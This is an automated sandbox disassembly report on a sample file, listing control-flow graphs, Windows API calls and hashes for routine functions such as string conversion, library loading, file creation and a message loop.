                                        control_flow_graph 910 bda95b-bda974 911 bda98a-bda98f 910->911 912 bda976-bda986 call bdef4c 910->912 914 bda99c-bda9c0 MultiByteToWideChar 911->914 915 bda991-bda999 911->915 912->911 919 bda988 912->919 917 bda9c6-bda9d2 914->917 918 bdab53-bdab66 call bcfbbc 914->918 915->914 920 bda9d4-bda9e5 917->920 921 bdaa26 917->921 919->911 924 bdaa04-bdaa15 call bd8e06 920->924 925 bda9e7-bda9f6 call be2010 920->925 923 bdaa28-bdaa2a 921->923 928 bdab48 923->928 929 bdaa30-bdaa43 MultiByteToWideChar 923->929 924->928 936 bdaa1b 924->936 925->928 935 bda9fc-bdaa02 925->935 933 bdab4a-bdab51 call bdabc3 928->933 929->928 932 bdaa49-bdaa5b call bdaf6c 929->932 940 bdaa60-bdaa64 932->940 933->918 939 bdaa21-bdaa24 935->939 936->939 939->923 940->928 942 bdaa6a-bdaa71 940->942 943 bdaaab-bdaab7 942->943 944 bdaa73-bdaa78 942->944 945 bdaab9-bdaaca 943->945 946 bdab03 943->946 944->933 947 bdaa7e-bdaa80 944->947 948 bdaacc-bdaadb call be2010 945->948 949 bdaae5-bdaaf6 call bd8e06 945->949 950 bdab05-bdab07 946->950 947->928 951 bdaa86-bdaaa0 call bdaf6c 947->951 953 bdab41-bdab47 call bdabc3 948->953 965 bdaadd-bdaae3 948->965 949->953 966 bdaaf8 949->966 952 bdab09-bdab22 call bdaf6c 950->952 950->953 951->933 963 bdaaa6 951->963 952->953 967 bdab24-bdab2b 952->967 953->928 963->928 968 bdaafe-bdab01 965->968 966->968 969 bdab2d-bdab2e 967->969 970 bdab67-bdab6d 967->970 968->950 971 bdab2f-bdab3f WideCharToMultiByte 969->971 970->971 971->953 972 bdab6f-bdab76 call bdabc3 971->972 972->933
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BD5695,00BD5695,?,?,?,00BDABAC,00000001,00000001,2DE85006), ref: 00BDA9B5
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BDABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BDAA3B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BDAB35
                                        • __freea.LIBCMT ref: 00BDAB42
                                          • Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38
                                        • __freea.LIBCMT ref: 00BDAB4B
                                        • __freea.LIBCMT ref: 00BDAB70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 5ff3eb1a95326627bf83865840b38cd9d4efb7b35fcfffe1460c83351c987c27
                                        • Instruction ID: a48365496eca46c3424c36c64122e19966bf5a434e487af2c8d6e115bff02349
                                        • Opcode Fuzzy Hash: 5ff3eb1a95326627bf83865840b38cd9d4efb7b35fcfffe1460c83351c987c27
                                        • Instruction Fuzzy Hash: 4851A072610216ABDB258F64CC81EBAF7EAEB44754F1546ABFC04D6240FB74DC41C6A2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 975 bd3b72-bd3b7c 976 bd3bee-bd3bf1 975->976 977 bd3b7e-bd3b8c 976->977 978 bd3bf3 976->978 980 bd3b8e-bd3b91 977->980 981 bd3b95-bd3bb1 LoadLibraryExW 977->981 979 bd3bf5-bd3bf9 978->979 984 bd3c09-bd3c0b 980->984 985 bd3b93 980->985 982 bd3bfa-bd3c00 981->982 983 bd3bb3-bd3bbc GetLastError 981->983 982->984 989 bd3c02-bd3c03 FreeLibrary 982->989 987 bd3bbe-bd3bd3 call bd6088 983->987 988 bd3be6-bd3be9 983->988 984->979 986 bd3beb 985->986 986->976 987->988 992 bd3bd5-bd3be4 LoadLibraryExW 987->992 988->986 989->984 992->982 992->988
                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00BD3C35,?,?,00C12088,00000000,?,00BD3D60,00000004,InitializeCriticalSectionEx,00BE6394,InitializeCriticalSectionEx,00000000), ref: 00BD3C03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: api-ms-
                                        • API String ID: 3664257935-2084034818
                                        • Opcode ID: 8ecb1ebc8a0238b8ae154cfb082170d56399d028e8b83771b758758d551d90c7
                                        • Instruction ID: 169ee824aa428975252d36f175108f8bcf1800ebb0339389c5a089490a484860
                                        • Opcode Fuzzy Hash: 8ecb1ebc8a0238b8ae154cfb082170d56399d028e8b83771b758758d551d90c7
                                        • Instruction Fuzzy Hash: 1D119431A45221ABCB218B589C85759B7E4DB01F70F1501A3E915FB391F761EF008AD2

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00BC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
                                          • Part of subcall function 00BC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858
                                        • OleInitialize.OLE32(00000000), ref: 00BCAC2F
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BCAC66
                                        • SHGetMalloc.SHELL32(00BF8438), ref: 00BCAC70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                        • String ID: riched20.dll$3Ro
                                        • API String ID: 3498096277-3613677438
                                        • Opcode ID: 41226f1967810c1d82c09cce241c2e67c9d472a379588ee4b4b8170ed6a84bae
                                        • Instruction ID: da4f6811e102ba33da76ffcd102d9e3e01fef9b6ab291867f2961296bcb09dfc
                                        • Opcode Fuzzy Hash: 41226f1967810c1d82c09cce241c2e67c9d472a379588ee4b4b8170ed6a84bae
                                        • Instruction Fuzzy Hash: 8AF0F9B5900249ABCB10AFA9D849AEFFBFCEF85704F00819AA415E2251DBB456058FA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 997 bb98e0-bb9901 call bcec50 1000 bb990c 997->1000 1001 bb9903-bb9906 997->1001 1003 bb990e-bb991f 1000->1003 1001->1000 1002 bb9908-bb990a 1001->1002 1002->1003 1004 bb9921 1003->1004 1005 bb9927-bb9931 1003->1005 1004->1005 1006 bb9933 1005->1006 1007 bb9936-bb9943 call bb6edb 1005->1007 1006->1007 1010 bb994b-bb996a CreateFileW 1007->1010 1011 bb9945 1007->1011 1012 bb99bb-bb99bf 1010->1012 1013 bb996c-bb998e GetLastError call bbbb03 1010->1013 1011->1010 1015 bb99c3-bb99c6 1012->1015 1018 bb99c8-bb99cd 1013->1018 1019 bb9990-bb99b3 CreateFileW GetLastError 1013->1019 1017 bb99d9-bb99de 1015->1017 1015->1018 1021 bb99ff-bb9a10 1017->1021 1022 bb99e0-bb99e3 1017->1022 1018->1017 1020 bb99cf 1018->1020 1019->1015 1023 bb99b5-bb99b9 1019->1023 1020->1017 1025 bb9a2e-bb9a39 1021->1025 1026 bb9a12-bb9a2a call bc0602 1021->1026 1022->1021 1024 bb99e5-bb99f9 SetFileTime 1022->1024 1023->1015 1024->1021 1026->1025
                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00BB7760,?,00000005,?,00000011), ref: 00BB995F
                                        • GetLastError.KERNEL32(?,?,00BB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB996C
                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00BB7760,?,00000005,?), ref: 00BB99A2
                                        • GetLastError.KERNEL32(?,?,00BB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB99AA
                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BB7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BB99F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: cb7554d992a069e8d03e27dc1a60c1851d57d6eccc2de2608ee2bccc2ab9c6f3
                                        • Instruction ID: c4012f84c8d020288036ed1d66a4e660f5d8fd4eadf0ddcf8cc6177b10aca9e4
                                        • Opcode Fuzzy Hash: cb7554d992a069e8d03e27dc1a60c1851d57d6eccc2de2608ee2bccc2ab9c6f3
                                        • Instruction Fuzzy Hash: 1A31C030544785AFE7309F24CC8ABEABBE4FB44320F200B59FAE1961D1D7E4A954CB95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1056 bcb568-bcb581 PeekMessageW 1057 bcb5bc-bcb5be 1056->1057 1058 bcb583-bcb597 GetMessageW 1056->1058 1059 bcb5a8-bcb5b6 TranslateMessage DispatchMessageW 1058->1059 1060 bcb599-bcb5a6 IsDialogMessageW 1058->1060 1059->1057 1060->1057 1060->1059
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
                                        • IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
                                        • TranslateMessage.USER32(?), ref: 00BCB5AC
                                        • DispatchMessageW.USER32(?), ref: 00BCB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: c606f5630ec59482d3fea678115cf02cbc3d9e876687e85d1e82d0e2ab671842
                                        • Instruction ID: 7fed78115184d5a7c45ef36ce5dcdde9f7349da44fdf9be9cfaf33ac88524172
                                        • Opcode Fuzzy Hash: c606f5630ec59482d3fea678115cf02cbc3d9e876687e85d1e82d0e2ab671842
                                        • Instruction Fuzzy Hash: DAF0BD71A0115AAB8B209BE59C4DFEF7FECEE062957008415B509D2010EB74D605CBB0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1061 bcabab-bcabca GetClassNameW 1062 bcabcc-bcabe1 call bc1fbb 1061->1062 1063 bcabf2-bcabf4 1061->1063 1068 bcabf1 1062->1068 1069 bcabe3-bcabef FindWindowExW 1062->1069 1064 bcabff-bcac01 1063->1064 1065 bcabf6-bcabf9 SHAutoComplete 1063->1065 1065->1064 1068->1063 1069->1068
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 00BCABC2
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 00BCABF9
                                          • Part of subcall function 00BC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BBC116,00000000,.exe,?,?,00000800,?,?,?,00BC8E3C), ref: 00BC1FD1
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BCABE9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: 27dfaf97536447c0e7a8c40bb3c97f34c70d30aba13618a6bc6a3edda985573e
                                        • Instruction ID: 2603df93008849e0845e2620f4381204da9b35766cfd88a795242cfbe059af68
                                        • Opcode Fuzzy Hash: 27dfaf97536447c0e7a8c40bb3c97f34c70d30aba13618a6bc6a3edda985573e
                                        • Instruction Fuzzy Hash: 5BF0823660026876DB2096259C09FDF76ECAB47B44F4880A9BA05F21C0D760DE4186B6

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1070 bb9785-bb9791 1071 bb979e-bb97b5 ReadFile 1070->1071 1072 bb9793-bb979b GetStdHandle 1070->1072 1073 bb9811 1071->1073 1074 bb97b7-bb97c0 call bb98bc 1071->1074 1072->1071 1075 bb9814-bb9817 1073->1075 1078 bb97d9-bb97dd 1074->1078 1079 bb97c2-bb97ca 1074->1079 1080 bb97df-bb97e8 GetLastError 1078->1080 1081 bb97ee-bb97f2 1078->1081 1079->1078 1082 bb97cc 1079->1082 1080->1081 1084 bb97ea-bb97ec 1080->1084 1085 bb980c-bb980f 1081->1085 1086 bb97f4-bb97fc 1081->1086 1083 bb97cd-bb97d7 call bb9785 1082->1083 1083->1075 1084->1075 1085->1075 1086->1085 1088 bb97fe-bb9807 GetLastError 1086->1088 1088->1085 1090 bb9809-bb980a 1088->1090 1090->1083
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00BB9795
                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00BB97AD
                                        • GetLastError.KERNEL32 ref: 00BB97DF
                                        • GetLastError.KERNEL32 ref: 00BB97FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: 59b3c85509a242d9f5e22d846fe7ad4c69c886a1faacbf03e1f7ca46eb37deee
                                        • Instruction ID: 49e873d80c6f0fdc3e7b00de410d7ad362b367eb8360b9942df8169bddb806cf
                                        • Opcode Fuzzy Hash: 59b3c85509a242d9f5e22d846fe7ad4c69c886a1faacbf03e1f7ca46eb37deee
                                        • Instruction Fuzzy Hash: 3811C230910614EBDF205F26CC44AF93BE9FB067A0F1089AAF61686190DBF08E44DB61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1091 bdad34-bdad48 1092 bdad4a-bdad53 1091->1092 1093 bdad55-bdad70 LoadLibraryExW 1091->1093 1094 bdadac-bdadae 1092->1094 1095 bdad99-bdad9f 1093->1095 1096 bdad72-bdad7b GetLastError 1093->1096 1099 bdada8 1095->1099 1100 bdada1-bdada2 FreeLibrary 1095->1100 1097 bdad7d-bdad88 LoadLibraryExW 1096->1097 1098 bdad8a 1096->1098 1101 bdad8c-bdad8e 1097->1101 1098->1101 1102 bdadaa-bdadab 1099->1102 1100->1099 1101->1095 1103 bdad90-bdad97 1101->1103 1102->1094 1103->1102
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BD3F73,00000000,00000000,?,00BDACDB,00BD3F73,00000000,00000000,00000000,?,00BDAED8,00000006,FlsSetValue), ref: 00BDAD66
                                        • GetLastError.KERNEL32(?,00BDACDB,00BD3F73,00000000,00000000,00000000,?,00BDAED8,00000006,FlsSetValue,00BE7970,FlsSetValue,00000000,00000364,?,00BD98B7), ref: 00BDAD72
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BDACDB,00BD3F73,00000000,00000000,00000000,?,00BDAED8,00000006,FlsSetValue,00BE7970,FlsSetValue,00000000), ref: 00BDAD80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 5d1e25bdbfe31c67e718eab7591700ad2c4b03a95f600ef4c3a54b2be062b958
                                        • Instruction ID: 217f154f8825634b00eeb61ab07fa6ae5a5377faa0db5b01af3703f13129434b
                                        • Opcode Fuzzy Hash: 5d1e25bdbfe31c67e718eab7591700ad2c4b03a95f600ef4c3a54b2be062b958
                                        • Instruction Fuzzy Hash: FE01FC36201226ABC7214E789CC8A57FBD9EF15B627110671F906D7760EB20D901CAE1
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00BBD343,00000001,?,?,?,00000000,00BC551D,?,?,?), ref: 00BB9F9E
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00BC551D,?,?,?,?,?,00BC4FC7,?), ref: 00BB9FE5
                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00BBD343,00000001,?,?), ref: 00BBA011
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FileWrite$Handle
                                        • String ID:
                                        • API String ID: 4209713984-0
                                        • Opcode ID: a4e368c1c5ccd91e7dc5df984697fcf33553c97d3d6d6683df80f82b985a37c1
                                        • Instruction ID: b11a1a1c0e5fcc622f05e02a4a2558fae28f55415410a3b6375c1baf25c631b3
                                        • Opcode Fuzzy Hash: a4e368c1c5ccd91e7dc5df984697fcf33553c97d3d6d6683df80f82b985a37c1
                                        • Instruction Fuzzy Hash: E131C031604345EFDB14DF24D858BBE77E5EF84B20F004959FA819B290CBB5AD48CBA2
                                        APIs
                                          • Part of subcall function 00BBC27E: _wcslen.LIBCMT ref: 00BBC284
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA2D9
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA30C
                                        • GetLastError.KERNEL32(?,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA329
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                        • String ID:
                                        • API String ID: 2260680371-0
                                        • Opcode ID: b5c9d9850a77cd2efea72df2c2e4a6269985d0b190e4f33260c60f834b4a51c3
                                        • Instruction ID: f18a921a76ca93487cc22ddae5aed4ec5a0af1f2db0a7f46c7fa739603047ead
                                        • Opcode Fuzzy Hash: b5c9d9850a77cd2efea72df2c2e4a6269985d0b190e4f33260c60f834b4a51c3
                                        • Instruction Fuzzy Hash: 390175319006546BEF21AB754C59BFD36D8DF09781F0444D5F902D6191DBE4CA8186BA
                                        APIs
                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BDB8B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
